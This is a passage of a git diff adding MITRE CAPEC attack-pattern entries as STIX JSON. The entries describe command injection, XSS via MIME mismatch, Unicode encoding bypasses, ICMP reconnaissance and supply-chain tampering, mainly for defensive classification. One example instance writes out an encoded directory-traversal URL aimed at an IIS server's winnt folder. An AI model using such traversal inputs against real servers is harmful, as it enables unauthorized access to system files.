+ { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html", + "external_id": "CWE-78" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/88.html", + "external_id": "CWE-88" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/713.html", + "external_id": "CWE-713" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Secunia Advisory SA16869: Firefox Command Line URL Shell Command Injection, Secunia Advisories, 2005--09---20, Secunia", + "url": "http://secunia.com/advisories/16869/", + "external_id": "REF-543" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "\n A transaction processing system relies on code written in a number of languages. To access this functionality, the system passes transaction information on the system command line.\n An attacker can gain access to the system command line and execute malicious commands by injecting these commands in the transaction data. If successful, the attacker can steal information, install backdoors and perform other nefarious activities that can compromise the system and its data.See also: A vulnerability in Mozilla Firefox 1.x browser allows an attacker to execute arbitrary commands on the UNIX/Linux operating system. The vulnerability is caused due to the shell script used to launch Firefox parsing shell commands that are enclosed within back-ticks in the URL provided via the command line. This can be exploited to execute arbitrary shell commands by tricking a user into following a malicious link in an external application which uses Firefox as the default browser (e.g. the mail client Evolution on Red Hat Enterprise Linux 4)." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "User controllable input used as part of commands to the underlying operating system." + ], + "x_capec_skills_required": { + "High": "The attacker needs to have knowledge of not only the application to exploit but also the exact nature of commands that pertain to the target operating system. This may involve, though not always, knowledge of specific assembly commands for the platform." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--3658dd5d-0e97-4e7e-9af1-b7fd307ea32a.json b/capec/attack-pattern/attack-pattern--3658dd5d-0e97-4e7e-9af1-b7fd307ea32a.json new file mode 100644 index 0000000000..9204a61666 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--3658dd5d-0e97-4e7e-9af1-b7fd307ea32a.json @@ -0,0 +1,81 @@ +{ + "type": "bundle", + "id": "bundle--19382510-d452-4c66-960a-b568c9db6107", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--3658dd5d-0e97-4e7e-9af1-b7fd307ea32a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "ICMP Address Mask Request", + "description": "An adversary sends an ICMP Type 17 Address Mask Request to gather information about a target's networking configuration. ICMP Address Mask Requests are defined by RFC-950, \"Internet Standard Subnetting Procedure.\" An Address Mask Request is an ICMP type 17 message that triggers a remote system to respond with a list of its related subnets, as well as its default gateway and broadcast address via an ICMP type 18 Address Mask Reply datagram. Gathering this type of information helps the adversary plan router-based attacks as well as denial-of-service attacks against the broadcast address. Many modern operating systems will not respond to ICMP type 17 messages for security reasons. Determining whether a system or router will respond to an ICMP Address Mask Request helps the adversary determine operating system or firmware version. Additionally, because these types of messages are rare, they are easily spotted by intrusion detection systems. Many ICMP scanning tools support IP spoofing to help conceal the origin of the actual request among a storm of similar ICMP messages. It is a common practice for border firewalls and gateways to be configured to block ingress ICMP type 17 and egress ICMP type 18 messages.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/294.html", + "external_id": "CAPEC-294" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "J. Mogul, J. Postel, RFC950 - Internet Standard Subnetting Procedure, 1985--08", + "url": "http://www.faqs.org/rfcs/rfc950.html", + "external_id": "REF-139" + }, + { + "source_name": "reference_from_CAPEC", + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc792.html", + "external_id": "REF-123" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Mark Wolfgang, Host Discovery with Nmap, 2002--11", + "url": "http://nmap.org/docs/discovery.pdf", + "external_id": "REF-125" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7", + "external_id": "REF-34" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Hide Activities" + ], + "Authorization": [ + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Hide Activities" + ] + }, + "x_capec_prerequisites": [ + "The ability to send an ICMP type 17 query (Address Mask Request) to a remote target and receive an ICMP type 18 message (ICMP Address Mask Reply) in response. Generally, modern operating systems will ignore ICMP type 17 messages, however, routers will commonly respond to this request." + ], + "x_capec_resources_required": [ + "The ability to send custom ICMP queries. This can be accomplished via the use of various scanners or utilities." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--36fba29d-f16f-4cf7-8324-118086f0fb5f.json b/capec/attack-pattern/attack-pattern--36fba29d-f16f-4cf7-8324-118086f0fb5f.json new file mode 100644 index 0000000000..c4f946c42f --- /dev/null +++ b/capec/attack-pattern/attack-pattern--36fba29d-f16f-4cf7-8324-118086f0fb5f.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--33c2cd48-bc5f-4c56-bf5d-538b514dcc20", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--36fba29d-f16f-4cf7-8324-118086f0fb5f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Privilege Escalation", + "description": "An adversary exploits a weakness enabling them to elevate their privilege and perform an action that they are not supposed to be authorized to perform.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/233.html", + "external_id": "CAPEC-233" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/269.html", + "external_id": "CWE-269" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--378426c3-2c53-4089-b701-769859d4ac37.json b/capec/attack-pattern/attack-pattern--378426c3-2c53-4089-b701-769859d4ac37.json new file mode 100644 index 0000000000..8093b5a57c --- /dev/null +++ b/capec/attack-pattern/attack-pattern--378426c3-2c53-4089-b701-769859d4ac37.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--590fb56d-819b-4dd8-b5e0-f6a62469e560", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--378426c3-2c53-4089-b701-769859d4ac37", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "DEPRECATED: XML Client-Side Attack", + "description": "This attack pattern has been deprecated as it a generalization of CAPEC-230: XML Nested Payloads and CAPEC-231: XML Oversized Payloads. Please refer to these CAPECs going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/484.html", + "external_id": "CAPEC-484" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--37922b04-8f75-4faa-ac2c-45eed4d17a3f.json b/capec/attack-pattern/attack-pattern--37922b04-8f75-4faa-ac2c-45eed4d17a3f.json new file mode 100644 index 0000000000..fe3c9c8359 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--37922b04-8f75-4faa-ac2c-45eed4d17a3f.json @@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--d414d9c1-8859-4ec0-b9a5-377072a85709", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--37922b04-8f75-4faa-ac2c-45eed4d17a3f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "XSS Using MIME Type Mismatch", + "description": "An adversary creates a file with scripting content but where the specified MIME type of the file is such that scripting is not expected. The adversary tricks the victim into accessing a URL that responds with the script file. Some browsers will detect that the specified MIME type of the file does not match the actual type of its content and will automatically switch to using an interpreter for the real content type. If the browser does not invoke script filters before doing this, the adversary's script may run on the target unsanitized, possibly revealing the victim's cookies or executing arbitrary script in their browser.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/209.html", + "external_id": "CAPEC-209" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html", + "external_id": "CWE-79" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/646.html", + "external_id": "CWE-646" + }, + { + "source_name": "reference_from_CAPEC", + "description": "OWASP Testing Guide (v4 [DRAFT]), The Open Web Application Security Project (OWASP)", + "url": "http://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OWASP-DV-002)", + "external_id": "REF-78" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "For example, the MIME type text/plain may be used where the actual content is text/javascript or text/html. Since text does not contain scripting instructions, the stated MIME type would indicate that filtering is unnecessary. However, if the target application subsequently determines the file's real type and invokes the appropriate interpreter, scripted content could be invoked.", + "In another example, img tags in HTML content could reference a renderable type file instead of an expected image file. The file extension and MIME type can describe an image file, but the file content can be text/javascript or text/html resulting in script execution. If the browser assumes all references in img tags are images, and therefore do not need to be filtered for scripts, this would bypass content filters." + ], + "x_capec_prerequisites": [ + "The victim must follow a crafted link that references a scripting file that is mis-typed as a non-executable file.", + "The victim's browser must detect the true type of a mis-labeled scripting file and invoke the appropriate script interpreter without first performing filtering on the content." + ], + "x_capec_resources_required": [ + "The adversary must have the ability to source the file of the incorrect MIME type containing a script." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--3825973d-9cb5-4c42-aae0-b9a9cec45da9.json b/capec/attack-pattern/attack-pattern--3825973d-9cb5-4c42-aae0-b9a9cec45da9.json new file mode 100644 index 0000000000..bdbf786302 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--3825973d-9cb5-4c42-aae0-b9a9cec45da9.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--d428a827-c1d2-42ca-a78e-b6f93d523f76", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--3825973d-9cb5-4c42-aae0-b9a9cec45da9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-12T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "IP Address Blocking", + "description": "An adversary performing this type of attack drops packets destined for a target IP address. The aim is to prevent access to the service hosted at the target IP address.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/590.html", + "external_id": "CAPEC-590" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html", + "external_id": "CWE-300" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Abdelberi Chaabane, Terence Chen, Mathieu Cunche, Emiliano De Cristofaro, Arik Friedman, Mohamed Ali Kaafar, Censorship in the Wild: Analyzing Internet Filtering in Syria, 2014--02, IMC 2014", + "external_id": "REF-475" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Other (Blocking packets intended for a target IP address denies its availability to the user.)" + ] + }, + "x_capec_example_instances": [ + "Consider situations of information censorship for political purposes, where regimes that prevent access to specific web services." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "This attack requires the ability to conduct deep packet inspection with an In-Path device that can drop the targeted traffic and/or connection." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--391db10c-8a3c-4887-8a83-f965edc5099d.json b/capec/attack-pattern/attack-pattern--391db10c-8a3c-4887-8a83-f965edc5099d.json new file mode 100644 index 0000000000..833b931e48 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--391db10c-8a3c-4887-8a83-f965edc5099d.json @@ -0,0 +1,125 @@ +{ + "type": "bundle", + "id": "bundle--d25deb42-1166-415b-8134-3934e2f1ee21", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--391db10c-8a3c-4887-8a83-f965edc5099d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Using Unicode Encoding to Bypass Validation Logic", + "description": "An attacker may provide a Unicode string to a system component that is not Unicode aware and use that to circumvent the filter or cause the classifying mechanism to fail to properly understanding the request. That may allow the attacker to slip malicious data past the content filter and/or possibly cause the application to route the request incorrectly.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/71.html", + "external_id": "CAPEC-71" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/176.html", + "external_id": "CWE-176" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/171.html", + "external_id": "CWE-171" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/179.html", + "external_id": "CWE-179" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html", + "external_id": "CWE-180" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html", + "external_id": "CWE-173" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html", + "external_id": "CWE-172" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html", + "external_id": "CWE-184" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/183.html", + "external_id": "CWE-183" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html", + "external_id": "CWE-692" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "\n Attack Example: Unicode Encodings in the IIS Server\n A very common technique for a Unicode attack involves traversing directories looking for interesting files. An example of this idea applied to the Web is\n http://target.server/some_directory/../../../winnt\n In this case, the attacker is attempting to traverse to a directory that is not supposed to be part of standard Web services. The trick is fairly obvious, so many Web servers and scripts prevent it. However, using alternate encoding tricks, an attacker may be able to get around badly implemented request filters.\n In October 2000, an adversary publicly revealed that Microsoft's IIS server suffered from a variation of this problem. In the case of IIS, all the attacker had to do was provide alternate encodings for the dots and/or slashes found in a classic attack. The Unicode translations are\n . yields C0 AE/ yields C0 AF\\ yields C1 9C\n Using this conversion, the previously displayed URL can be encoded as\n http://target.server/some_directory/%C0AE/%C0AE/%C0AE%C0AE/%C0AE%C0AE/winntSee also: CVE-2000-0884" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Filtering is performed on data that has not be properly canonicalized." + ], + "x_capec_skills_required": { + "Medium": "An attacker needs to understand Unicode encodings and have an idea (or be able to find out) what system components may not be Unicode aware." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--392168be-b0e4-4de3-8529-b956d1396a21.json b/capec/attack-pattern/attack-pattern--392168be-b0e4-4de3-8529-b956d1396a21.json new file mode 100644 index 0000000000..c4b0804b96 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--392168be-b0e4-4de3-8529-b956d1396a21.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--c10cd417-c390-4616-b4e9-ad3d38b827c9", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--392168be-b0e4-4de3-8529-b956d1396a21", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Reverse Engineering", + "description": "An adversary discovers the structure, function, and composition of an object, resource, or system by using a variety of analysis techniques to effectively determine how the analyzed entity was constructed or operates. The goal of reverse engineering is often to duplicate the function, or a part of the function, of an object in order to duplicate or \"back engineer\" some aspect of its functioning. Reverse engineering techniques can be applied to mechanical objects, electronic devices, or software, although the methodology and techniques involved in each type of analysis differ widely.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/188.html", + "external_id": "CAPEC-188" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "url": "http://en.wikipedia.org/wiki/Reverse_engineering", + "external_id": "REF-50" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_example_instances": [ + "When adversaries are reverse engineering software, methodologies fall into two broad categories, 'white box' and 'black box.' White box techniques involve methods which can be applied to a piece of software when an executable or some other compiled object can be directly subjected to analysis, revealing at least a portion of its machine instructions that can be observed upon execution. 'Black Box' methods involve interacting with the software indirectly, in the absence of the ability to measure, instrument, or analyze an executable object directly. Such analysis typically involves interacting with the software at the boundaries of where the software interfaces with a larger execution environment, such as input-output vectors, libraries, or APIs." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Access to targeted system, resources, and information." + ], + "x_capec_resources_required": [ + "The technical resources necessary to engage in reverse engineering differ in accordance with the type of object, resource, or system being analyzed." + ], + "x_capec_skills_required": { + "High": "Understanding of low level programming languages or technologies can be very helpful. For example, when reverse engineering a binary file, an understanding of assembly languages can help to determine the purpose and inner-workings of the code. Another example is reverse engineering an application that relies on networking. Here, an understanding networking protocols can provide insight into application details." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--39ab0d55-78c5-4be6-a99a-25f80706340a.json b/capec/attack-pattern/attack-pattern--39ab0d55-78c5-4be6-a99a-25f80706340a.json new file mode 100644 index 0000000000..6d93dc8189 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--39ab0d55-78c5-4be6-a99a-25f80706340a.json @@ -0,0 +1,168 @@ +{ + "type": "bundle", + "id": "bundle--1fe83fc8-6506-47f3-ac91-3fe94fc021f4", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--39ab0d55-78c5-4be6-a99a-25f80706340a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Leverage Alternate Encoding", + "description": "An adversary leverages the possibility to encode potentially harmful input or content used by applications such that the applications are ineffective at validating this encoding standard.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/267.html", + "external_id": "CAPEC-267" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html", + "external_id": "CWE-173" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html", + "external_id": "CWE-172" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html", + "external_id": "CWE-180" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html", + "external_id": "CWE-181" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/171.html", + "external_id": "CWE-171" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html", + "external_id": "CWE-73" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/21.html", + "external_id": "CWE-21" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html", + "external_id": "CWE-692" + }, + { + "source_name": "reference_from_CAPEC", + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "url": "http://projects.webappsec.org/Improper-Input-Handling", + "external_id": "REF-108" + }, + { + "source_name": "reference_from_CAPEC", + "description": "OWASP, The Open Web Application Security Project (OWASP)", + "url": "http://www.owasp.org/index.php/Category:Encoding", + "external_id": "REF-109" + }, + { + "source_name": "reference_from_CAPEC", + "description": "OWASP, The Open Web Application Security Project (OWASP)", + "url": "http://www.owasp.org/index.php/Canonicalization,_locale_and_Unicode", + "external_id": "REF-110" + }, + { + "source_name": "reference_from_CAPEC", + "description": "OWASP, The Open Web Application Security Project (OWASP)", + "url": "http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet", + "external_id": "REF-111" + }, + { + "source_name": "reference_from_CAPEC", + "description": "David Wheeler, Secure Programming for Linux and Unix HOWTO", + "url": "http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/character-encoding.html", + "external_id": "REF-112" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "url": "http://en.wikipedia.org/wiki/Character_encoding", + "external_id": "REF-113" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Eric Hacker, IDS Evasion with Unicode, 2001--01---03", + "url": "http://www.securityfocus.com/infocus/1232", + "external_id": "REF-114" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Availability": [ + "Unreliable Execution (Denial of Service)", + "Resource Consumption (Denial of Service)" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, and 7 does not properly handle unspecified \"encoding strings,\" which allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site, aka \"Post Encoding Information Disclosure Vulnerability.\" Related Vulnerabilities CVE-2010-0488", + "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application's decoder accepts and interprets encoded characters. Data canonicalization, input filtering and validating is not done properly leaving the door open to harmful characters for the target host." + ], + "x_capec_skills_required": { + "Low": "An attacker can inject different representation of a filtered character in a different encoding.", + "Medium": "An attacker may craft subtle encoding of input data by using the knowledge that he/she has gathered about the target host." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--39c9e944-7904-4697-bd04-d1122c2e7731.json b/capec/attack-pattern/attack-pattern--39c9e944-7904-4697-bd04-d1122c2e7731.json new file mode 100644 index 0000000000..3ecfa3b6c5 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--39c9e944-7904-4697-bd04-d1122c2e7731.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--1bd1be3a-b05b-4892-a029-f10b4ac0e856", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--39c9e944-7904-4697-bd04-d1122c2e7731", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Malicious Logic Insertion into Product Software via Configuration Management Manipulation", + "description": "An adversary exploits a configuration management system so that malicious logic is inserted into a software products build, update or deployed environment. If an adversary can control the elements included in a product's configuration management for build they can potentially replace, modify or insert code files containing malicious logic. If an adversary can control elements of a product's ongoing operational configuration management baseline they can potentially force clients receiving updates from the system to install insecure software when receiving updates from the server. Configuration management servers operate on the basis of a client pool, instructing each client on which software to install. In some cases the configuration management server will automate the software installation process. A malicious insider or an adversary who has compromised the server can alter the software baseline that clients must install, allowing the adversary to compromise a large number of satellite machines using the configuration management system. If an adversary can control elements of a product's configuration management for its deployed environment they can potentially alter fundamental security properties of the system based on assumptions that secure configurations are in place.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/445.html", + "external_id": "CAPEC-445" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Information Technology Laboratory, Supply Chain Risk Management (SCRM), 2010, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the configuration management system during deployment or currently deployed at a victim location. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--3a0ddbcc-69da-4fec-aea0-df3d26b886c1.json b/capec/attack-pattern/attack-pattern--3a0ddbcc-69da-4fec-aea0-df3d26b886c1.json new file mode 100644 index 0000000000..20fa56e7da --- /dev/null +++ b/capec/attack-pattern/attack-pattern--3a0ddbcc-69da-4fec-aea0-df3d26b886c1.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--4969ca11-3004-4325-99fb-c76064972ec5", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--3a0ddbcc-69da-4fec-aea0-df3d26b886c1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "name": "Malicious Hardware Component Replacement", + "description": "An attacker replaces legitimate hardware in the system with faulty counterfeit or tampered hardware in the supply chain distribution channel, with purpose of causing malicious disruption or allowing for additional compromise when the system is deployed.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/522.html", + "external_id": "CAPEC-522" + }, + 